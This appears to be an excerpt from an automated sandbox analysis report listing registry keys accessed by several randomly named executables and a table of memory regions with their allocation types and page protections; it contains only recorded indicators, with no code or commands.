ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
|
AppIdList
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
|
GlobalDeviceUpdateTime
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qhqkdfqhdepedo
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qhqkdfqhdepedo
|
DeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qhqkdfqhdepedo
|
DeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
|
AppIdList
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jhspajbkplugms
|
DeviceId
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
|
ValidDeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jhspajbkplugms
|
DeviceId
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
|
LID
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jhspajbkplugms
|
DeviceId
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
|
Data
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
ProgramId
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
FileId
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
LowerCaseLongPath
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
LongPathHash
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Name
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
OriginalFileName
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Publisher
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Version
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
BinFileVersion
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
BinaryType
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
ProductName
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
ProductVersion
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
LinkDate
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
BinProductVersion
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
AppxPackageFullName
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Size
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Language
|
||
\REGISTRY\A\{d77ea6bd-3c9b-4ffb-1364-13584dddf5e0}\Root\InventoryApplicationFile\spczxf.exe|68db5335483a143d
|
Usn
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018400ECC1D2B97
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceTicket
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}
|
DeviceId
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
ProgramId
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
FileId
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
LowerCaseLongPath
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
LongPathHash
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Name
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
OriginalFileName
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Publisher
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Version
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
BinFileVersion
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
BinaryType
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
ProductName
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
ProductVersion
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
LinkDate
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
BinProductVersion
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
AppxPackageFullName
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Size
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Language
|
||
\REGISTRY\A\{977489e1-26cd-5051-fe2b-6c3608473ec3}\Root\InventoryApplicationFile\ohvrxt.exe|96d56d58678d3476
|
Usn
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
ProgramId
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
FileId
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
LowerCaseLongPath
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
LongPathHash
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Name
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
OriginalFileName
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Publisher
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Version
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
BinFileVersion
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
BinaryType
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
ProductName
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
ProductVersion
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
LinkDate
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
BinProductVersion
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
AppxPackageFullName
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Size
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Language
|
||
\REGISTRY\A\{a3170f81-2516-d93f-42c5-7ed5b42788de}\Root\InventoryApplicationFile\hgzxhw.exe|b4466335238a80c3
|
Usn
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
|
DontOfferThroughWUAU
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
ProgramId
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
FileId
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
LowerCaseLongPath
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
LongPathHash
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Name
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
OriginalFileName
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Publisher
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Version
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
BinFileVersion
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
BinaryType
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
ProductName
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
ProductVersion
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
LinkDate
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
BinProductVersion
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
AppxPackageFullName
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
AppxPackageRelativeId
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Size
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Language
|
||
\REGISTRY\A\{04f1a324-187d-7cba-6fec-033a4a66aa61}\Root\InventoryApplicationFile\utntwb.exe|3367f9824d2efdd4
|
Usn
|
There are 156 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
307B000
|
trusted library allocation
|
page read and write
|
||
16E9AC91000
|
trusted library allocation
|
page read and write
|
||
1A4C3F01000
|
trusted library allocation
|
page read and write
|
||
2AF1000
|
trusted library allocation
|
page read and write
|
||
1A4B2722000
|
trusted library allocation
|
page read and write
|
||
402000
|
remote allocation
|
page execute and read and write
|
||
16E9B268000
|
trusted library allocation
|
page read and write
|
||
292640E2000
|
trusted library allocation
|
page read and write
|
||
16E9AD6A000
|
trusted library allocation
|
page read and write
|
||
1B044693000
|
trusted library allocation
|
page read and write
|
||
1BC90222000
|
trusted library allocation
|
page read and write
|
||
7FFAAC558000
|
trusted library allocation
|
page read and write
|
||
B9B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC3A0000
|
trusted library allocation
|
page read and write
|
||
7FFAACAD6000
|
trusted library allocation
|
page read and write
|
||
23D06F69000
|
heap
|
page read and write
|
||
292623F0000
|
trusted library allocation
|
page read and write
|
||
26E36D35000
|
heap
|
page read and write
|
||
633000
|
trusted library allocation
|
page execute and read and write
|
||
2927C13E000
|
heap
|
page read and write
|
||
7FFB1D556000
|
unkown
|
page readonly
|
||
7FFAACB44000
|
trusted library allocation
|
page read and write
|
||
887000
|
heap
|
page read and write
|
||
7FFAAC34A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6AD000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7E3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC754000
|
trusted library allocation
|
page read and write
|
||
7FFAAC838000
|
trusted library allocation
|
page read and write
|
||
142D5B60000
|
heap
|
page read and write
|
||
1B042825000
|
heap
|
page read and write
|
||
7FFAAC240000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F76000
|
heap
|
page read and write
|
||
B97000
|
trusted library allocation
|
page execute and read and write
|
||
B0C6BFE000
|
unkown
|
page readonly
|
||
7FFAAC216000
|
trusted library allocation
|
page execute and read and write
|
||
200A9930000
|
heap
|
page read and write
|
||
B0C617E000
|
stack
|
page read and write
|
||
7FFAAC826000
|
trusted library allocation
|
page read and write
|
||
23D06F79000
|
heap
|
page read and write
|
||
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7D4000
|
trusted library allocation
|
page read and write
|
||
7FFAACA42000
|
trusted library allocation
|
page read and write
|
||
7FFAAC956000
|
trusted library allocation
|
page read and write
|
||
142D6504000
|
heap
|
page read and write
|
||
7FFAAC814000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6FF000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
1A4B0950000
|
heap
|
page read and write
|
||
7FFAAC82B000
|
trusted library allocation
|
page read and write
|
||
1932CE50000
|
heap
|
page read and write
|
||
7FFAAC844000
|
trusted library allocation
|
page read and write
|
||
7FFAACB32000
|
trusted library allocation
|
page read and write
|
||
54DC000
|
stack
|
page read and write
|
||
142D5D29000
|
heap
|
page read and write
|
||
7FFAAC879000
|
trusted library allocation
|
page read and write
|
||
1BCA0201000
|
trusted library allocation
|
page read and write
|
||
7FFAAC13D000
|
trusted library allocation
|
page execute and read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
7FFAAC8E0000
|
trusted library allocation
|
page read and write
|
||
14000E000
|
remote allocation
|
page execute and read and write
|
||
7FFAAC4F8000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3D0000
|
trusted library allocation
|
page read and write
|
||
142D5C1D000
|
heap
|
page read and write
|
||
7FFAAC326000
|
trusted library allocation
|
page read and write
|
||
7FFAAC557000
|
trusted library allocation
|
page read and write
|
||
7FFAAC724000
|
trusted library allocation
|
page read and write
|
||
1932CE10000
|
heap
|
page read and write
|
||
7FFAAC81D000
|
trusted library allocation
|
page read and write
|
||
384BFFE000
|
unkown
|
page readonly
|
||
23D06F59000
|
heap
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
1BC90207000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7D2000
|
trusted library allocation
|
page read and write
|
||
23D06E15000
|
heap
|
page read and write
|
||
7FFAACA12000
|
trusted library allocation
|
page read and write
|
||
23D076E1000
|
heap
|
page read and write
|
||
1A4CD870000
|
heap
|
page read and write
|
||
23D06F7F000
|
heap
|
page read and write
|
||
1BCAA3E4000
|
heap
|
page read and write
|
||
7FFAACB0F000
|
trusted library allocation
|
page read and write
|
||
7FF7FE547000
|
unkown
|
page read and write
|
||
1BCA8D40000
|
heap
|
page execute and read and write
|
||
7FFAAC206000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC2CF000
|
trusted library allocation
|
page read and write
|
||
6DEC000
|
stack
|
page read and write
|
||
1BC8E6B0000
|
heap
|
page read and write
|
||
23D076AB000
|
heap
|
page read and write
|
||
7FFAAC388000
|
trusted library allocation
|
page read and write
|
||
7FFAAC4F5000
|
trusted library allocation
|
page read and write
|
||
7FFAACB2D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
23D076F6000
|
heap
|
page read and write
|
||
1A4B2B4F000
|
trusted library allocation
|
page read and write
|
||
23D06F84000
|
heap
|
page read and write
|
||
7FFAAC84E000
|
trusted library allocation
|
page read and write
|
||
200AB630000
|
direct allocation
|
page execute and read and write
|
||
2927F432000
|
heap
|
page read and write
|
||
7FFAACA19000
|
trusted library allocation
|
page read and write
|
||
7FFAAC92D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6FF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC150000
|
trusted library allocation
|
page read and write
|
||
23D06F7C000
|
heap
|
page read and write
|
||
5CC4000
|
heap
|
page read and write
|
||
1B0424F0000
|
heap
|
page read and write
|
||
1DDEEE60000
|
heap
|
page read and write
|
||
1BC8E823000
|
trusted library allocation
|
page read and write
|
||
142D5D17000
|
heap
|
page read and write
|
||
42D64FE000
|
stack
|
page read and write
|
||
23D0770A000
|
heap
|
page read and write
|
||
7FFAAC756000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7EF000
|
trusted library allocation
|
page read and write
|
||
1F289E2B000
|
heap
|
page read and write
|
||
29263CE0000
|
heap
|
page execute and read and write
|
||
23D06F10000
|
heap
|
page read and write
|
||
7FFAAC8CD000
|
trusted library allocation
|
page read and write
|
||
16E99335000
|
heap
|
page read and write
|
||
1A4B080C000
|
unkown
|
page readonly
|
||
200A9910000
|
heap
|
page read and write
|
||
7FFB23AB0000
|
unkown
|
page read and write
|
||
7FFAAC7C2000
|
trusted library allocation
|
page read and write
|
||
1F28A302000
|
heap
|
page read and write
|
||
7FFAAC88D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC812000
|
trusted library allocation
|
page read and write
|
||
9B8000
|
trusted library allocation
|
page read and write
|
||
142DB30C000
|
heap
|
page read and write
|
||
292623F3000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
23D07679000
|
heap
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
23D06F5B000
|
heap
|
page read and write
|
||
1A4CA6F0000
|
trusted library allocation
|
page read and write
|
||
1B0427C5000
|
heap
|
page read and write
|
||
7FFAAC2C7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC440000
|
trusted library allocation
|
page execute and read and write
|
||
16EB3750000
|
heap
|
page read and write
|
||
7FFAAC371000
|
trusted library allocation
|
page read and write
|
||
142DB440000
|
trusted library allocation
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
7FFAAC134000
|
trusted library allocation
|
page read and write
|
||
7FFAACB3C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC346000
|
trusted library allocation
|
page read and write
|
||
23D06590000
|
heap
|
page read and write
|
||
7FFAAC72B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC94D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC637000
|
trusted library allocation
|
page read and write
|
||
1A4B0992000
|
heap
|
page read and write
|
||
23D07723000
|
heap
|
page read and write
|
||
7FFAAC138000
|
trusted library allocation
|
page read and write
|
||
7FFAAC793000
|
trusted library allocation
|
page read and write
|
||
29A5CFE000
|
stack
|
page read and write
|
||
16E9AC80000
|
heap
|
page execute and read and write
|
||
23D076DD000
|
heap
|
page read and write
|
||
2927C773000
|
heap
|
page read and write
|
||
7FFAAC40A000
|
trusted library allocation
|
page read and write
|
||
292621CC000
|
heap
|
page read and write
|
||
7FFAACA8B000
|
trusted library allocation
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
292640E5000
|
trusted library allocation
|
page read and write
|
||
1BCA8540000
|
heap
|
page read and write
|
||
7FFAACBA0000
|
trusted library allocation
|
page execute and read and write
|
||
140000000
|
remote allocation
|
page execute and read and write
|
||
142DB261000
|
heap
|
page read and write
|
||
1BC8E6B5000
|
heap
|
page read and write
|
||
7FFAAC58C000
|
trusted library allocation
|
page read and write
|
||
7FFAAC14D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAACB11000
|
trusted library allocation
|
page read and write
|
||
7FFAACAB9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC2D2000
|
trusted library allocation
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
1A4B08C0000
|
heap
|
page read and write
|
||
7FFAAC828000
|
trusted library allocation
|
page read and write
|
||
23D06F81000
|
heap
|
page read and write
|
||
23D06F2C000
|
heap
|
page read and write
|
||
7FFAAC82B000
|
trusted library allocation
|
page read and write
|
||
7FFAAC979000
|
trusted library allocation
|
page read and write
|
||
23D06F83000
|
heap
|
page read and write
|
||
7FFAACA36000
|
trusted library allocation
|
page read and write
|
||
7FFAAC14B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC83A000
|
trusted library allocation
|
page read and write
|
||
7FFAAC72D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC79A000
|
trusted library allocation
|
page read and write
|
||
23D06F09000
|
heap
|
page read and write
|
||
7FFAACA12000
|
trusted library allocation
|
page read and write
|
||
7FFAACAFC000
|
trusted library allocation
|
page read and write
|
||
1F28A313000
|
heap
|
page read and write
|
||
7FFAAC130000
|
trusted library allocation
|
page read and write
|
||
7FFAACBA0000
|
trusted library allocation
|
page execute and read and write
|
||
7A5C0FC000
|
stack
|
page read and write
|
||
23D076CA000
|
heap
|
page read and write
|
||
7FFAAC250000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC1F0000
|
trusted library allocation
|
page execute and read and write
|
||
1BC8E4E2000
|
unkown
|
page readonly
|
||
7FFAAC824000
|
trusted library allocation
|
page read and write
|
||
7FFAAC528000
|
trusted library allocation
|
page read and write
|
||
1A4B2AB3000
|
trusted library allocation
|
page read and write
|
||
7FFAAC76C000
|
trusted library allocation
|
page read and write
|
||
2B27000
|
heap
|
page read and write
|
||
292621EB000
|
heap
|
page read and write
|
||
B0C607C000
|
stack
|
page read and write
|
||
7FFAAC8AB000
|
trusted library allocation
|
page read and write
|
||
2109C450000
|
remote allocation
|
page read and write
|
||
7FFAAC4A7000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6FF000
|
trusted library allocation
|
page read and write
|
||
7FFAAC7B2000
|
trusted library allocation
|
page read and write
|
||
23D06F59000
|
heap
|
page read and write
|
||
7FFAAC882000
|
trusted library allocation
|
page read and write
|
||
7FFAAC531000
|
trusted library allocation
|
page read and write
|
||
7D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC1F0000
|
trusted library allocation
|
page execute and read and write
|
||
16E99254000
|
heap
|
page read and write
|
||
7FFAAC744000
|
trusted library allocation
|
page read and write
|
||
2109A404000
|
heap
|
page read and write
|
||
17D46E68000
|
heap
|
page read and write
|
||
1F289F15000
|
trusted library allocation
|
page read and write
|
||
2109A404000
|
heap
|
page read and write
|
||
2109A300000
|
heap
|
page readonly
|
||
29A57FF000
|
stack
|
page read and write
|
||
7FFAAC2F0000
|
trusted library allocation
|
